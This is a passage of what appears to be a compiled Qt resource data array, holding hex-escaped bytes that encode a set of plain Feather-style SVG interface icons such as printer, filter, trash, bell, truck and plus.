\x2e\x31\x34\x20\x32\x20\x37\x2e\x38\x36\x20\x37\x2e\x38\x36\x20\
\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x38\
\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x36\x22\x20\x78\
\x32\x3d\x22\x31\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\x22\x31\x36\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x72\x6f\x74\x61\x74\
\x65\x2d\x63\x63\x77\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x20\x34\x20\x31\x20\x31\
\x30\x20\x37\x20\x31\x30\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x33\x2e\x35\
\x31\x20\x31\x35\x61\x39\x20\x39\x20\x30\x20\x31\x20\x30\x20\x32\
\x2e\x31\x33\x2d\x39\x2e\x33\x36\x4c\x31\x20\x31\x30\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x97\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x72\x69\x6e\x74\
\x65\x72\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x36\x20\x39\x20\x36\x20\x32\x20\x31\x38\
\x20\x32\x20\x31\x38\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x36\x20\
\x31\x38\x48\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x2d\x32\x76\x2d\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\
\x32\x2d\x32\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x20\x32\x20\x32\x76\x35\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\
\x2d\x32\x20\x32\x68\x2d\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\
\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x36\x22\x20\x79\x3d\x22\x31\
\x34\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x32\x22\x20\x68\x65\
\x69\x67\x68\x74\x3d\x22\x38\x22\x3e\x3c\x2f\x72\x65\x63\x74\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x22\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x66\x69\x6c\x74\x65\
\x72\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x32\x32\x20\x33\x20\x32\x20\x33\x20\x31\x30\x20\
\x31\x32\x2e\x34\x36\x20\x31\x30\x20\x31\x39\x20\x31\x34\x20\x32\
\x31\x20\x31\x34\x20\x31\x32\x2e\x34\x36\x20\x32\x32\x20\x33\x22\
\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x5f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x75\x73\x2d\
\x63\x69\x72\x63\x6c\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\
\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\
\x72\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\
\x3d\x22\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\
\x22\x31\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\
\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x64\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x61\x73\x68\
\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x33\x20\x36\x20\x35\x20\x36\x20\x32\x31\x20\x36\
\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x31\x39\x20\x36\x76\x31\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\x48\x37\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x36\x6d\x33\
\x20\x30\x56\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x2d\x32\x68\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\
\x20\x32\x76\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x76\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x65\x6c\x65\x74\
\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\x20\
\x34\x48\x38\x6c\x2d\x37\x20\x38\x20\x37\x20\x38\x68\x31\x33\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x32\x2d\x32\x56\x36\x61\
\x32\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x2d\x32\x7a\x22\x3e\
\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x38\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x38\x22\x20\
\x79\x32\x3d\x22\x31\x35\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x41\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x65\x6c\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x38\x20\x38\x41\
\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\x36\x20\x38\x63\x30\x20\
\x37\x2d\x33\x20\x39\x2d\x33\x20\x39\x68\x31\x38\x73\x2d\x33\x2d\
\x32\x2d\x33\x2d\x39\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\
\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x33\x2e\x37\x33\x20\x32\x31\
\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x33\x2e\x34\x36\x20\
\x30\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\x3e\
\
\x00\x00\x01\x18\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x76\x6f\x6c\x75\x6d\
\x65\x22\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x31\x31\x20\x35\x20\x36\x20\x39\x20\x32\x20\x39\
\x20\x32\x20\x31\x35\x20\x36\x20\x31\x35\x20\x31\x31\x20\x31\x39\
\x20\x31\x31\x20\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x69\x6e\x73\x74\x61\
\x67\x72\x61\x6d\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x32\
\x22\x20\x79\x3d\x22\x32\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\
\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x30\x22\x20\x72\
\x78\x3d\x22\x35\x22\x20\x72\x79\x3d\x22\x35\x22\x3e\x3c\x2f\x72\
\x65\x63\x74\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x36\
\x20\x31\x31\x2e\x33\x37\x41\x34\x20\x34\x20\x30\x20\x31\x20\x31\
\x20\x31\x32\x2e\x36\x33\x20\x38\x20\x34\x20\x34\x20\x30\x20\x30\
\x20\x31\x20\x31\x36\x20\x31\x31\x2e\x33\x37\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x37\x2e\x35\x22\x20\x79\x31\x3d\x22\x36\x2e\x35\x22\x20\x78\x32\
\x3d\x22\x31\x37\x2e\x35\x31\x22\x20\x79\x32\x3d\x22\x36\x2e\x35\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x6e\x64\x65\x72\
\x6c\x69\x6e\x65\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x36\x20\x33\x76\x37\x61\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\
\x36\x20\x36\x20\x36\x20\x36\x20\x30\x20\x30\x20\x30\x20\x36\x2d\
\x36\x56\x33\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x34\x22\x20\x79\x31\x3d\x22\x32\x31\x22\
\x20\x78\x32\x3d\x22\x32\x30\x22\x20\x79\x32\x3d\x22\x32\x31\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x9f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x72\x75\x63\x6b\
\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\x3d\x22\x31\x22\x20\x79\x3d\
\x22\x33\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x35\x22\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x72\x65\x63\
\x74\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x31\x36\x20\x38\x20\x32\x30\x20\x38\x20\x32\x33\x20\
\x31\x31\x20\x32\x33\x20\x31\x36\x20\x31\x36\x20\x31\x36\x20\x31\
\x36\x20\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\x3c\
\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x35\x2e\x35\x22\x20\
\x63\x79\x3d\x22\x31\x38\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\
\x6c\x65\x20\x63\x78\x3d\x22\x31\x38\x2e\x35\x22\x20\x63\x79\x3d\
\x22\x31\x38\x2e\x35\x22\x20\x72\x3d\x22\x32\x2e\x35\x22\x3e\x3c\
\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x30\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x75\x73\x22\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x35\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\
\x3d\x22\x31\x39\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x35\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x31\x39\x22\x20\x79\x32\x3d\x22\x31\x32\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3b\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
